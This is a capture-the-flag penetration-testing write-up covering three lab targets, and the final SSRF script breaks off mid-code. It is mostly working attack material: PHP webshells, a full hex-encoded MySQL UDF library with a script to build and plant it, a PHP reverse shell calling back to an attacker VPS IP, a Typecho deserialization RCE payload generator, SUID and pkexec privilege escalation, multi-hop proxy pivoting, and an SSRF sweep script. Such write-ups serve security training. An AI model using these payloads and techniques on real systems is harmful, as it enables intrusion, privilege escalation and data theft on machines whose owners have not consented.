Penetration Test 1

Target: http://101.133.129.4:80

image-20250218125948526

Scenario 1

The page source contains the flag and a hint for the next one.

image-20250218130041254

Scenario 2

Directory scanning finds /admin.

image-20250218130709303

A weak-credential brute force gives admin:admin; login succeeds.

image-20250218130817705

The second flag and the next hint are inside.

image-20250218131042818

Scenario 3

The "add" function accepts PHP file uploads.

image-20250218131407513

There is also an online code-execution feature.

image-20250218131830032

Use it to write a file (the written shell.php runs whatever is posted in parameter 1 and calls phpinfo so the result is visible):

<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[1]);phpinfo();?>')?>

image-20250218132056989

Connect with AntSword (蚁剑) and find the flag.

image-20250218132049072

Scenario 4

The database configuration file app/database.php is found.

image-20250218132311433

Connect to the database, changing localhost to 127.0.0.1 (for MySQL clients "localhost" means the Unix socket, which the webshell's PHP may not be able to reach; 127.0.0.1 forces TCP).

image-20250218132929237

The flag is in the database.

image-20250218133105622

Scenario 5

The challenge hints at a pwn route, but I don't do pwn, so UDF privilege escalation is used instead.

image-20250218133234014

Check the server version first (the UDF library must match the server's architecture):

image-20250218133629241

image-20250218134028810

Plugin directory (plugin_dir), which is where the library has to be written:

image-20250218134053342

MySQL/MariaDB UDF privilege escalation works here. The hex below is the lib_mysqludf_sys library as published in "MySQL UDF 提权十六进制查询 | 国光"; it is written straight into the plugin directory with INTO DUMPFILE, which requires the FILE privilege and an empty secure_file_priv:

SELECT 0x7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de0100000000000079010000120000000000000
0000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e697
4007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004
883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488
b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028fafff
f030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000
000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b00000000000018000000000000000000000
0000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b00000000000000000000000000000001000000000000000000000000000000010000000300000000000000000000000000000
0000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000 INTO DUMPFILE '/usr/lib/x86_64-linux-gnu/mariadb18/plugin/udf.so';

image-20250218134419402

Then register the function from the dumped library (SONAME is resolved relative to plugin_dir, which is why the file had to land there):

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';

image-20250218134526706

Privilege escalation succeeds: sys_eval runs shell commands as the user mysqld runs as.
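As an added example (not from the writeup or from 国光's article), the following Python builds the DUMPFILE statement from a local .so file and checks, before anything is sent, that the blob really is a 64-bit x86-64 ELF shared object, the condition under which CREATE FUNCTION will succeed on this server. The plugin directory and the sys_eval registration are the writeup's; the preflight queries are the checks a practitioner runs first; the ELF header used in the test is constructed, not a real library.

```python
import struct

# Added example: generate "SELECT 0x... INTO DUMPFILE" for a UDF library and
# sanity-check the blob before sending it. Paths/soname follow the writeup.
ELF_MAGIC = b"\x7fELF"
ELFCLASS64 = 2
ET_DYN = 3
EM_X86_64 = 62


def check_shared_object(blob: bytes) -> None:
    """Raise ValueError unless blob is a 64-bit x86-64 ELF shared object (ET_DYN).

    mysqld dlopen()s the file, so a wrong class/arch or a non-shared object only
    fails later, at CREATE FUNCTION ("Can't open shared library"); check here.
    """
    if len(blob) < 64 or blob[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    if blob[4] != ELFCLASS64:  # e_ident[EI_CLASS]
        raise ValueError("expected ELFCLASS64 (64-bit) object")
    e_type, e_machine = struct.unpack_from("<HH", blob, 16)  # little-endian header fields
    if e_type != ET_DYN:
        raise ValueError("ELF is not a shared object (ET_DYN)")
    if e_machine != EM_X86_64:
        raise ValueError("ELF is not built for x86-64")


def udf_dumpfile_sql(blob: bytes, plugin_dir: str, soname: str = "udf.so") -> str:
    """One statement; the hex literal avoids quoting issues and DUMPFILE writes
    the exact bytes with no escaping and no trailing newline."""
    check_shared_object(blob)
    path = plugin_dir.rstrip("/") + "/" + soname
    return f"SELECT 0x{blob.hex()} INTO DUMPFILE '{path}';"


def preflight_sql() -> list:
    """Run these first: the dump only lands if secure_file_priv is empty (not NULL,
    not another directory) and the target path is the server's real plugin_dir."""
    return [
        "SHOW VARIABLES LIKE 'plugin_dir';",
        "SHOW VARIABLES LIKE 'secure_file_priv';",
        "SHOW VARIABLES LIKE 'version_compile_machine';",
    ]


def register_sql(soname: str = "udf.so") -> list:
    """Register sys_eval from the dumped library and prove it works."""
    return [
        f"CREATE FUNCTION sys_eval RETURNS STRING SONAME '{soname}';",
        "SELECT sys_eval('id');",
    ]


if __name__ == "__main__":
    import sys
    # usage: python udf_sql.py lib_mysqludf_sys.so /usr/lib/x86_64-linux-gnu/mariadb18/plugin
    with open(sys.argv[1], "rb") as f:
        print(udf_dumpfile_sql(f.read(), sys.argv[2]))
```

If secure_file_priv is NULL the DUMPFILE is refused outright and UDF is a dead end; if it names a directory other than plugin_dir, the file can be written there but SONAME will not find it.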

image-20250218134604005

This gives the fifth flag and a hint pointing at port 8080.

image-20250218135214532

Scenario 6

Port 8080 is yet another login form.

image-20250218135425078

image-20250218135510277

robots.txt gives the flag.

image-20250218140517824

Scenario 7

Try a weak-credential login while capturing the request.

image-20250218135818744

The response carries the classic header:

Set-Cookie: rememberMe=deleteMe;

That identifies Apache Shiro. The rememberMe cookie is AES-encrypted serialized Java; when the server still uses a known hard-coded key the cookie can be forged for deserialization RCE (Shiro-550), which is exactly what the Shiro exploitation tool automates, so go straight to it.

image-20250218140053333

Search for the flag.

image-20250218140152882

/root/flag cannot be read; only /home/flag is readable, so this is not yet root.

Scenario 8

image-20250218140833264

Try privilege escalation through a SUID find:

find / -perm -4000 -type f 2>/dev/null   # list SUID binaries; find itself is among them
find flag -exec whoami \;
  • find flag: look for a file or directory named flag under the current directory.
  • -exec whoami \;: run whoami for every match; because find is SUID root, the command runs as root.
  • whoami: prints the effective user, so "root" here confirms the escalation.
  • \;: terminates the -exec command.

image-20250218141204946

The flag is read the same way, and it comes with a hint about the internal network.

Scenario 9

image-20250218141831460

Upload fscan and venom.

Scan the segment:

./fscan -h 192.168.0.2/24

AntSword's terminal is a virtual terminal and shows no live output, so read the result file fscan writes by default:

cat result.txt

[+] Port open 192.168.0.4:80
[+] Port open 192.168.0.2:80
[+] Port open 192.168.0.1:80
[+] Port open 192.168.0.1:22
[+] Port open 192.168.0.4:3306
[+] Port open 192.168.0.3:8080
[+] Port open 192.168.0.1:8080
[+] Port open 192.168.0.2:9999
[+] Port open 192.168.0.1:9999
[*] Site title http://192.168.0.4 status: 200 length: 8351 title: 博客首页
[*] Site title http://192.168.0.1:8080 status: 302 length: 0 title: untitled redirect: http://192.168.0.1:8080/login;jsessionid=C2F897E86587DFF88D23E0B904BEE5F1
[*] Site title http://192.168.0.3:8080 status: 302 length: 0 title: untitled redirect: http://192.168.0.3:8080/login;jsessionid=E38D96AE83415803DBF186137E09B661
[*] Site title http://192.168.0.3:8080/login;jsessionid=E38D96AE83415803DBF186137E09B661 status: 200 length: 2608 title: Login Page
[*] Site title http://192.168.0.1:8080/login;jsessionid=C2F897E86587DFF88D23E0B904BEE5F1 status: 200 length: 2608 title: Login Page
[*] Site title http://192.168.0.1 status: 200 length: 59431 title: W3School教程系统 | 打造专一的web在线教程系统
[*] Site title http://192.168.0.2 status: 200 length: 59431 title: W3School教程系统 | 打造专一的web在线教程系统
[+] Vulnerability detected http://192.168.0.1:8080/ poc-yaml-shiro-key params:[{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]
[+] Vulnerability detected http://192.168.0.3:8080/ poc-yaml-shiro-key params:[{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]
[+] [Vulnerability found] target: http://192.168.0.4
type: poc-yaml-thinkphp5023-method-rce
name: poc1
details: %!s(<nil>)

192.168.0.2 is the current host and 192.168.0.1 serves the same content (presumably the gateway mapping it), so the new targets are 192.168.0.3 (the Shiro app, whose default key kPH+bIxk5D2deZiIxcaaaA== fscan confirms, i.e. Scenario 7 again) and 192.168.0.4 (a ThinkPHP 5.0.23 blog with the method RCE).

Use a PHP file for a reverse shell back to the VPS:

<?php
// Reverse shell: connect back to the VPS and attach /bin/sh's stdin/stdout/stderr
// to the socket. A listener must already be waiting on the VPS (e.g. nc -lvnp 2333).
$ip   = '8.134.149.24';   // attacker VPS
$port = '2333';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
    0 => $sock,   // stdin
    1 => $sock,   // stdout
    2 => $sock,   // stderr
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

Run it with php b.php; the shell arrives on the VPS listener.

Attacker (VPS): ./admin_linux_x64 -lport 9999
Target: ./agent_linux_x64 -rhost 8.134.149.24 -rport 9999

image-20250218163727625

The internal hosts are reachable through the tunnel.

image-20250218151202143

Configure Proxifier first (pointing at the SOCKS port opened from the venom admin console), then exploit 192.168.0.4 directly with the ThinkPHP 5.0.23 method RCE N-day that fscan flagged.

image-20250218163837694

Connect with AntSword to get the flag and the next hint.

image-20250218160239648

Scenario 10

The database configuration is found in the application files.

image-20250218160523491

Connect to the database for the flag.

image-20250218163914553

Scenario 11

Escalate to root with PwnKit (CVE-2021-4034, the SUID pkexec bug).

image-20250218190919740

Alternatively, sudo is version 1.8.31, which is inside the range affected by Baron Samedit (CVE-2021-3156, heap overflow in sudoedit), so that also works.

Reference: bugkuctf渗透测试1(超详细版)_bugku 渗透测试1-CSDN博客

Penetration Test 2

Target: http://106.14.92.16:80

image-20250218194234242

Scenario 1

image-20250218194247502

The page source reveals the Typecho version.

image-20250218194322791

A search turns up the N-day: Typecho's install.php unserializes the __typecho_config value, and a Typecho_Feed/Typecho_Request object chain turns the resulting __toString into an assert() call. Payload generator:

<?php
// Typecho install.php deserialization chain. Typecho_Db's constructor concatenates
// the adapter name, which calls Typecho_Feed::__toString; that reads ->screenName on
// the Typecho_Request objects, whose __get applies the 'assert' filter to the parameter.
class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;

    public function __construct()
    {
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title'    => '1',
            'link'     => '1',
            'date'     => 1508895132,
            'category' => array(new Typecho_Request()),
            'author'   => new Typecho_Request(),
        );
    }
}

class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct()
    {
        // code executed by assert(): drops shell.php next to install.php
        $this->_params['screenName'] = 'fputs(fopen(\'shell.php\',\'w\'),\'<?=@eval($_REQUEST[1])?>\')';
        $this->_filter[0] = 'assert';
    }
}

$exp = array(
    'adapter' => new Typecho_Feed(),
    'prefix'  => 'typecho_',
);

echo base64_encode(serialize($exp));
?>


The Referer header has to be added manually: install.php rejects the request unless the Referer points at the site itself. The base64 string goes in the __typecho_config cookie (or POST field) of /install.php?finish=1.

image-20250218195228124

image-20250218202317881

image-20250218202341541

Scenario 2

The configuration file is found through the shell.

image-20250218202454788

image-20250218202550814

It holds the second flag.

Scenario 3

No more hints, so check the network interfaces.

image-20250218203458663

Upload fscan and scan:

./fscan -h 192.168.0.2/24
(www-data:/tmp) $ cat r*
[+] Port open 192.168.0.3:80
[+] Port open 192.168.0.1:80
[+] Port open 192.168.0.2:80
[+] Port open 192.168.0.1:22
[+] Port open 192.168.0.2:3306
[*] Site title http://192.168.0.2 status: 200 length: 3392 title: Harry's Blog
[*] Site title http://192.168.0.1 status: 200 length: 3392 title: Harry's Blog
[+] MySQL 192.168.0.2:3306:root
[*] Site title http://192.168.0.3 status: 200 length: 4789 title: Bugku后台管理系统

Set up the proxy (admin on the VPS, agent on the target):

./admin_linux_x64 -lport 9999

./agent_linux_x64 -rhost 8.134.149.24 -rport 9999

192.168.0.3 shows a login form.

image-20250218204222258

Capturing the login request reveals /source.zip.

image-20250218204521906

Download it: the application uses a vulnerable Log4j (Log4Shell, JNDI lookup injected through a logged login field).

image-20250218204746570

image-20250219165433011

Reverse shell obtained.

image-20250219165308113

env shows three flags in the environment variables.

image-20250219165715250

Scenario 4

cat flag in the current directory gives the Scenario 4 flag.

image-20250219165549781

Scenario 5

image-20250219165713344

Scenario 6

Check the network interfaces again.

image-20250219165921973

A second segment, 192.168.1.2/24, is attached.

Fetch fscan and venom with wget from a simple HTTP server on the VPS:

image-20250219171405974

VPS:
1. python -m http.server 8000
Client:
1. wget http://xxxxxx:8000/fscan
2. wget http://xxxxxx:8000/agent_linux_x64


fscan the segment; a Git repository host shows up:

[+] target 192.168.1.2 alive (ICMP)
[+] target 192.168.1.1 alive (ICMP)
[+] target 192.168.1.3 alive (ICMP)
[+] ICMP-alive hosts: 3
[*] parsed 218 valid ports
[+] Port open 192.168.1.3:80
[+] Port open 192.168.1.1:80
[+] Port open 192.168.1.2:80
[+] Port open 192.168.1.1:22
[+] open ports: 4
[*] starting vulnerability scan...
[*] Site title http://192.168.1.2 status: 200 length: 4789 title: Bugku后台管理系统
[*] Site title http://192.168.1.1 status: 200 length: 3392 title: Harry's Blog
[*] Site title http://192.168.1.3 status: 200 length: 524 title: 乙公司Git仓库

On this host start a listening agent, ./agent_linux_x64 -lport 9899, and connect to it from the venom node already in the chain to add the second hop.

image-20250219172339214

The new segment is now reachable.

Entering the GitHub URL the page hints at gives the flag.

image-20250219172532621

Scenario 7

Someone else's repository is used here (https://github.com/TheBeastofwar/webshell-repository.git).

Only the .phtml extension is executed as PHP, so the shell is committed with that name:

<?php phpinfo();@eval($_POST[1]);?>

image-20250219182208776

image-20250219182419304

The flag is read through it.

Scenario 8

image-20250219182706606

Upload the tools to this host:

image-20250219183545222

./fscan -h 10.10.0.2/24
[+] Port open 10.10.0.1:80
[+] Port open 10.10.0.2:80
[+] Port open 10.10.0.1:22
[+] Port open 10.10.0.3:21
[*] Site title http://10.10.0.2 status: 200 length: 524 title: 乙公司Git仓库
[*] Site title http://10.10.0.1 status: 200 length: 3368 title: Harry's Blog

Add the third hop to the proxy chain:

Target: ./agent_linux_x64 -lport 9899

Attacker (venom admin console, from the node that can reach it): connect 192.168.0.3 9899

image-20250219185219638

Configure proxychains (one SOCKS port per venom node, all opened by the admin on the VPS):

[ProxyList]

socks5 8.134.149.24 9998
socks5 8.134.149.24 9997
socks5 8.134.149.24 9996

FTP login: username and password are both guest.

image-20250219184913174

One flag is in the login directory.

image-20250219184940147

Scenario 9

The other is in the root directory.

cd to / first, then get the file.

image-20250219184957723

Penetration Test 3

Target: http://101.133.129.4/

image-20250220094646799

Scenario 1

The "spider simulation" page fetches whatever URL it is given (SSRF), and /etc/passwd is read successfully through it.

image-20250220094615348

file:///flag reads the flag.

image-20250220094736118

Scenarios 2 & 3

Next, fscan from the outside:

[*] final valid host count: 1
[*] parsed 218 valid ports
[+] Port open 101.133.129.4:22
[+] Port open 101.133.129.4:80
[+] open ports: 2
[*] starting vulnerability scan...
[*] Site title http://101.133.129.4 status: 200 length: 1987 title: 站长之家 - 模拟蜘蛛爬取

Directory scanning finds no pre-planted webshell either.

Use the SSRF for internal probing; going by the previous two ranges, try 192.168.0.x and 192.168.1.x.

Hosts .1, .2, .10, .138 and .250 respond: .1 and .2 are this same site, .10 is a defaced site, .138 is a SQL query page and .250 is a login form.
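As an added example (not code from the writeup), here is the sweep above done systematically: ask the SSRF endpoint to fetch http://host/ for every address in a /24 and separate real hosts from the endpoint's own "could not connect" page. The status code is useless here, because the vulnerable page answers 200 whether or not its inner request succeeded, so hosts are told apart by body length. The endpoint URL is the writeup's target; the parameter name `url` is an assumption (the writeup does not show it); the responses in the test are constructed.

```python
import ipaddress
from collections import Counter
from urllib.error import URLError
from urllib.parse import urlencode
from urllib.request import urlopen

# Added example: SSRF-driven host discovery. ENDPOINT is the writeup's target;
# PARAM is an assumed name for the "URL to fetch" parameter.
ENDPOINT = "http://101.133.129.4/"
PARAM = "url"


def default_fetch(url: str, timeout: float = 5.0) -> bytes:
    with urlopen(url, timeout=timeout) as resp:
        return resp.read()


def ssrf_probe(endpoint: str, param: str, network: str, fetch=default_fetch) -> dict:
    """Return {host: body_length} for every host the endpoint was asked to fetch.

    The SSRF page itself returns 200 either way, so only the body carries signal.
    A failure of the outer request (our connection to the endpoint) skips that host
    instead of aborting the whole sweep.
    """
    results = {}
    for host in ipaddress.ip_network(network).hosts():
        url = f"{endpoint}?{urlencode({param: f'http://{host}/'})}"
        try:
            results[str(host)] = len(fetch(url))
        except (URLError, OSError):
            continue
    return results


def live_hosts(results: dict) -> dict:
    """Treat the most common body length as the endpoint's connection-error page
    and report every host whose body differs from it."""
    if not results:
        return {}
    dead_len = Counter(results.values()).most_common(1)[0][0]
    return {h: n for h, n in results.items() if n != dead_len}


if __name__ == "__main__":
    hits = live_hosts(ssrf_probe(ENDPOINT, PARAM, "192.168.0.0/24"))
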